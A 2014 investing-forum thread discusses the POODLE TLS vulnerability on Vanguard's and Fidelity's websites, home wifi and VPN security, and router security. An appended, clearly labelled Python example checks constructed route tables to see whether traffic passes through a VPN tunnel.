Mudpuppy wrote:It is far more difficult and requires far more knowledge to hack into the core routers and the IP subnet. There are safeguards in place to prevent routing hijacking and that part of the infrastructure gets a little more attention than your average network. Yes, it would be a remote attack and it would have a bigger "return" on the virtual "investment", but why bother with robbing the bank, so to speak, when you can just have some mules siphon off bits and pieces here and there that collectively adds up to a tasty haul.
Yes, and if it does get discovered, probably no one is going to investigate it very seriously. Whereas if someone manages to worm their way into the internet backbone (which I still doubt is possible for anyone other than the NSA, GCHQ, and other major state sponsored entities), you can bet that the FBI and lots of heavy duty powers are going to be all over it.

So it's not just that it's harder to get into the backbone, if possible at all, it's that the risk for a criminal just looking to make money is huge. Whereas ripping off mom and pop usually goes entirely unpunished and that's why they are such a juicy target. Go after the low hanging fruit, I think that's where most crime is at. The super sophisticated attacks are for the world of espionage, not mobsters. At the most, sophisticated criminals go after businesses (Target, Home Depot) not the internet backbone (and even in the case of Target and Home Depot that only worked because the point of sale terminals were so ridiculously insecure and Target and Home Depot did such a terrible job with their own IT).

Ged
Posts: 3839
Joined: Mon May 13, 2013 1:48 pm
Location: Roke

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ged » Thu Dec 11, 2014 11:35 pm

Well I checked Fidelity using the above site and they also get an F due to the new Poodle vulnerability. Apparently many many financial institutions have this problem.

From what I understand about this is that it's often not just a matter of patching a web server - the components that often show this problem are load balancers. While some vendors have patched their firmware it could be that there is stuff out there that may have a real lead time to fix because it's physical, say like an ASIC.

Just another reason to not access anything important over public wifi.

jwillis77373
Posts: 395
Joined: Mon Jun 25, 2007 9:52 pm
Location: Texas

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by jwillis77373 » Thu Dec 11, 2014 11:38 pm

Vanguard carries out most transactions with a settlement date and a generous amount of "out of bandwidth" communications to confirm a trade and follow up.

Even if it is vulnerable, the risk is mitigated by the proactive trade confirmations by email, which also provide information for canceling or freezing your account.

Enable but "don't trust any transaction" is final until "after" the settlement date seems to be the standard mode of operation.

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Fri Dec 12, 2014 1:27 am

Ninegrams wrote: Now if you're saying that it's pointless to manage our end given the other risks, then you're of course fine to do that for yourself, others may feel differently.
I never said that. The OP's post is making people aware of the latest Poodle TLS vulnerability - good stuff, nice job. Then I see many subsequent comments related to making sure you secure your home wireless router to somehow magically protect you against Poodle and other MitM attacks. Such as:
cb474 wrote:if you connect to your home router with WEP--as many people surprisingly still do--
Ninegrams wrote:Most home routers have at least one ethernet port, so using that instead of wifi would be about as safe as you can get.
kenyan wrote: Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.
Ninegrams wrote:Hiding your SSID doesn't make you any safer:
Do you think upgrading your home router's wireless security from WPA to WPA2 AES PSK is suddenly going to lower your personal risk of falling victim to a Poodle TLS attack by some significant percentage? Any percentage? Sure, you should be running WPA2 at home - no doubt - I'm not saying otherwise - I just don't understand what it has to do with lowering your Poodle TLS risk.

Listen - you're 1,000,000,000x more likely to browse to a website that's hosting malicious content (BTW, often unbeknownst to the website owner), be it through a poison well attack or phish, and as a result have your browser hijacked, malware installed and/or proxy settings simply configured to point to the bad guys' infrastructure (often covertly) -- all of which would allow various cyber crime actors to easily perpetrate a Poodle sslv3 or TLS attack completely remote -- All of which, IMO, is much more probable than a rogue actor physically traveling to your house/street - or 1,000 homes/streets, sniffing WEP/WPA traffic, cracking keys, setting up MitM infrastructure in their car, somehow inserting their tool into your SSL session, etc. If you think otherwise, I don't know what to tell you.
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
cb474 wrote:But there's nothing wrong with using the occasion to remind people of best practices, as far as their own computer security goes, in public and for their home routers. Since most people have very bad security practices, the point needs to be repeated a lot. Why you would be against educating people about computer security is beyond me.
Agree. I'm not against fostering cyber security awareness, quite the opposite, and I don't know why you think my first reply was somehow slamming your original post OP (and now needing to defend). I just don't see what home wifi security really has much to do with Poodle TLS. e.g. If you started a new post with "Hey, FYI, there's this new SSL vulnerability called Poodle TLS out there -- be careful." and I reply with all 615 pages of:

- NIST 800-53 - Security and Privacy Controls for Federal Information Systems and Organizations - http://nvlpubs.nist.gov/nistpubs/Specia ... 0-53r4.pdf
- NIST 800-153 - Guidelines for Securing Wireless Local Area Networks (WLANs) - http://csrc.nist.gov/publications/nistp ... 00-153.pdf
- NIST 800-95 - Guide to Secure Web Services - http://csrc.nist.gov/publications/nistp ... 800-95.pdf

Is that really helping someone protect themselves from Poodle TLS? No.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Fri Dec 12, 2014 1:54 am

killjoy2012 wrote:
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
There is no "which is it?". It is both. There are excellent IT professionals when it comes to security, mediocre IT professionals when it comes to security, and everything in between. Saying all IT workers have the same level of security skills is like saying a doctor currently in family practice could perform the same sort of surgery as a world-class cardiologist simply because they are both in the medical field.

Just as there are different skill levels and areas of expertise within IT workers, there are different levels of hardware/firmware classified as "routers". There is a distinct difference between a core router and an edge router in the IP subnet, just as there is a distinct difference between a home router and a small corporate router. They're all routers, but they are not all made equal. So saying you found a vulnerable Cisco router on a banner-collecting website like Shodan doesn't really say much at all unless you refine that to at least a level of intended service.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: Vanguard site Very Vulnerable to ‘Poodle’ Bug

Post by Mudpuppy » Fri Dec 12, 2014 1:55 am

This is already being discussed over on viewtopic.php?f=10&t=152577&p=2291320#p2287237

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 4:46 am

Mudpuppy wrote:
killjoy2012 wrote:
cb474 wrote:Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks
cb474 wrote:I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing.
So, which is it? It's the same "IT guys" building and operating these devices. And if you think Cisco/Juniper commercial routers are somehow these super secure devices that rarely have any vulnerabilities or default passwords/configs - go spend some time on Shodan.
There is no "which is it?". It is both. There are excellent IT professionals when it comes to security, mediocre IT professionals when it comes to security, and everything in between. Saying all IT workers have the same level of security skills is like saying a doctor currently in family practice could perform the same sort of surgery as a world-class cardiologist simply because they are both in the medical field.

Just as there are different skill levels and areas of expertise within IT workers, there are different levels of hardware/firmware classified as "routers". There is a distinct difference between a core router and an edge router in the IP subnet, just as there is a distinct difference between a home router and a small corporate router. They're all routers, but they are not all made equal. So saying you found a vulnerable Cisco router on a banner-collecting website like Shodan doesn't really say much at all unless you refine that to at least a level of intended service.
You beat me to the punch, Mudpuppy. There is a huge difference between the people designing routers for Cisco, etc., and the people installing special firmware on hotel or other public wifi routers just to track your usage for their marketing purposes. And the people who are responsible for routers in the backbone of the internet are also far more sophisticated and talented than, say, the IT guy at your office. And so on. I did not in any way suggest they are all the same and in fact was making the point that Mudpuppy makes, if you read my above post carefully.

Unfortunately, we are also discovering that not all financial institutions are as on the ball as others. Vanguard and Fidelity are lagging on their response to the TLS 1.2 Poodle bug. Schwab and several other banks I checked weren't vulnerable as soon as it was announced. This is not the first time I've been disappointed in Vanguard's website security. They do seem to lag the leaders in the financial services industry.

Anyway, I don't see the point of this debate over home routers. If killjoy2012 does not think the TLS 1.2 Poodle bug is a worthy occasion to mention ensuring one's home wifi uses WPA2 encryption, good luck to those who take this advice and don't check the security of their home routers. To all others, I strongly encourage you to ignore this advice and make sure your home router uses WPA2 encryption. This is not some big deal complicated thing, so not taking the couple minutes necessary to set it up is foolhardy, I think. If you don't believe me, just do a search on WEP vs WPA2 encryption and see if you can find anyone out there recommending the difference doesn't matter, because someone is unlikely to target your home router directly.

max12377
Posts: 149
Joined: Tue Jul 15, 2008 4:02 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by max12377 » Fri Dec 12, 2014 5:10 am

Meh, the bug is called Poodle.. If it were called DeathRay or Incinerator I might be concerned but what's to fear from a Poodle ?

:beer

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 5:18 am

FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.

ThankYouJack
Posts: 3088
Joined: Wed Oct 08, 2014 7:27 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by ThankYouJack » Fri Dec 12, 2014 8:51 am

cb474 wrote:
ThankYouJack wrote:
cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN).
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?
If you've configured the VPN correctly all data on your computer should go through an encrypted tunnel to the VPN, before heading to Vanguard's servers. So it's not that the veritable man in the middle would not see your traffic, it's just that it would be encrypted and unreadable for them.
I think all of your other advice is great, except the statement that a VPN will encrypt all data could be misleading. My organization uses split tunneling so only traffic to the servers in the organization is encrypted through the VPN. After reading the OP, it could make me believe that I was fine going to a Poodle vulnerable website in a hotel or cafe as long as I was connected to the VPN. However, I would be just as vulnerable if I wasn't connected to the VPN.

packet
Posts: 833
Joined: Sun Nov 23, 2014 11:23 am
Location: The pub

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by packet » Fri Dec 12, 2014 9:32 am

Yet another good reason ... Don't Peek!

viewtopic.php?f=10&t=152768&newpost=2290161

Cheers,
Packet
sniffsniff... :beer
First round’s on me.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Fri Dec 12, 2014 2:14 pm

cb474 wrote:FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.
That's actually quicker than I expected. The level of bureaucratic red-tape one has to handle before doing server patches in a corporate environment, much less a financial institution which has regulations to consider, can be daunting and time consuming. Back in the "ancient" past, I had a friend who was working as a system administrator for a large, multinational bank. I recall picking him up from work to hang out for the evening and seeing the massive stack of paperwork on his desk that he had to fill out related to the Y2K patches he was applying to the servers.

LadyGeek
Site Admin
Posts: 58750
Joined: Sat Dec 20, 2008 5:34 pm
Location: Philadelphia
Contact:

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by LadyGeek » Fri Dec 12, 2014 3:28 pm

FYI - I moved geekpryde's thread into here.
To some, the glass is half full. To others, the glass is half empty. To an engineer, it's twice the size it needs to be.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Fri Dec 12, 2014 8:03 pm

ThankYouJack wrote:I think all of your other advice is great, except the statement that a VPN will encrypt all data could be misleading. My organization uses split tunneling so only traffic to the servers in the organization is encrypted through the VPN. After reading the OP, it could make me believe that I was fine going to a Poodle vulnerable website in a hotel or cafe as long as I was connected to the VPN. However, I would be just as vulnerable if I wasn't connected to the VPN.
I believe you that this is how your organization's VPN works. Maybe that's more common with VPNs for workplaces? But I've never seen a third party VPN service that is not designed to set up an encrypted tunnel for all traffic. This is the whole point of these services. Of course, how well they work and what happens when they fail or disconnect can be done better or worse, as I discuss above. But I do think the usual point of a VPN is to create an encrypted tunnel for all traffic.

Also, strictly speaking, it does sound like your organization's VPN works in the way I described. It creates an encrypted tunnel to the organization's server. That's its purpose. To create a private, secure connection for all interaction with the organization. But other traffic, when you read the news, etc., is your own traffic and so not encrypted. This is different from a VPN service whose sole purpose is not to connect you to their server as your end destination to work with that server, but whose purpose is to pass all your traffic through their server to make it secure and private--i.e. their server is a middle point between all traffic and your end destinations, not the destination itself.

I guess people should not assume that if they have a VPN connection to their workplace, that means all their internet traffic is encrypted and secure to anywhere on the internet. That would be a potentially mistaken assumption. Although I would not have made that assumption if it was my work VPN. Work VPNs are different from privacy service VPNs. But clearly there's room for confusion, as you point out.
Mudpuppy wrote:
cb474 wrote:FYI, all servers at investor.vanguard.com and vanguard.com appear to be updated for the bug now.
That's actually quicker than I expected. The level of bureaucratic red-tape one has to handle before doing server patches in a corporate environment, much less a financial institution which has regulations to consider, can be daunting and time consuming. Back in the "ancient" past, I had a friend who was working as a system administrator for a large, multinational bank. I recall picking him up from work to hang out for the evening and seeing the massive stack of paperwork on his desk that he had to fill out related to the Y2K patches he was applying to the servers.
It is also quicker than I thought it was going to be and I'm happy that they reacted so quickly.

On the other hand, when the bug was first announced I found that most financial institutions (my bank, other banks, other investment companies) were already not vulnerable to the bug--although some others were, as pointed out in this thread. So either financial institutions and other vulnerable industries had a heads up before the bug was publicly announced, which is often the case, and hence what we really saw was that Vanguard failed to heed the advance warning and deal with the bug before it became public knowledge (and therefore more of a target). Or what we saw was that Vanguard was not doing something that other companies were doing that simply intrinsically made TLS 1.2 already not vulnerable to the bug. So to me Vanguard's response was good, but still lagging the best in (if not the majority of) the industry.

And even though they have now fixed it, I'm still astonished that vanguard.com remained vulnerable until now to the original SSLv3 poodle bug from months ago. That's just negligent.

To me it fits a long running pattern with Vanguard not being as good at server security as they should be and lagging behind the best companies.
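The split-tunnel point ThankYouJack raised, and the earlier advice to confirm your traffic actually goes through the VPN, can both be checked against the machine's routing table: the kernel picks the longest matching prefix, so a "full tunnel" is only full if every public destination resolves to the tunnel interface. This is an added example, not code from any poster or VPN provider; the two route tables, the interface names (tun0, wlan0) and every address in them are constructed.

```python
"""Which destinations really leave through the VPN tunnel?

Added example for this thread (not from any poster or vendor). Route tables
are constructed in `ip route show` style; tun0/wlan0 and all addresses are
made up. 192.0.2.10 stands in for a brokerage web server, 198.51.100.5 for
the VPN endpoint itself.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed: a full-tunnel session. The two /1 routes are the "def1" style
# override OpenVPN uses: together they cover all of IPv4 and, being longer
# than the /0 default, win without the default route having to be removed.
FULL_TUNNEL = """
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
0.0.0.0/1 via 10.8.0.1 dev tun0
128.0.0.0/1 via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
198.51.100.5 via 192.168.1.1 dev wlan0
"""

# Constructed: a split-tunnel (workplace style) session. Only the corporate
# 10.0.0.0/8 goes through tun0; everything else still uses the cafe wifi.
SPLIT_TUNNEL = """
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
10.0.0.0/8 via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
198.51.100.5 via 192.168.1.1 dev wlan0
"""


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    dev: str
    metric: int


def parse_routes(text: str) -> List[Route]:
    """Parse `ip route show` style lines; only dst, dev and metric matter."""
    routes = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts:
            continue
        dst = "0.0.0.0/0" if parts[0] == "default" else parts[0]
        dev = parts[parts.index("dev") + 1]
        metric = int(parts[parts.index("metric") + 1]) if "metric" in parts else 0
        routes.append(Route(ipaddress.ip_network(dst, strict=False), dev, metric))
    return routes


def egress_for(routes: List[Route], host: str) -> Optional[str]:
    """Device the kernel would send packets for `host` out of: longest
    prefix match, lower metric breaking ties. None if nothing matches."""
    addr = ipaddress.ip_address(host)
    matches = [r for r in routes if addr in r.prefix]
    if not matches:
        return None
    best = min(matches, key=lambda r: (-r.prefix.prefixlen, r.metric))
    return best.dev


def bypassing(routes: List[Route], tunnel_dev: str, hosts: List[str]) -> Dict[str, Optional[str]]:
    """Sampled hosts whose traffic would NOT use tunnel_dev, mapped to the
    device it would use instead. An empty dict means every sample is tunnelled."""
    leaks = {}
    for host in hosts:
        dev = egress_for(routes, host)
        if dev != tunnel_dev:
            leaks[host] = dev
    return leaks


if __name__ == "__main__":
    samples = ["192.0.2.10", "203.0.113.7", "10.1.2.3"]
    for name, table in (("full tunnel", FULL_TUNNEL), ("split tunnel", SPLIT_TUNNEL)):
        print(name, "bypassing tun0:", bypassing(parse_routes(table), "tun0", samples))
```

The route table only shows where packets are steered while the tunnel is up; the firewall rules mentioned earlier in the thread are still what keeps traffic from silently falling back to wlan0 when the VPN drops.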

Post Reply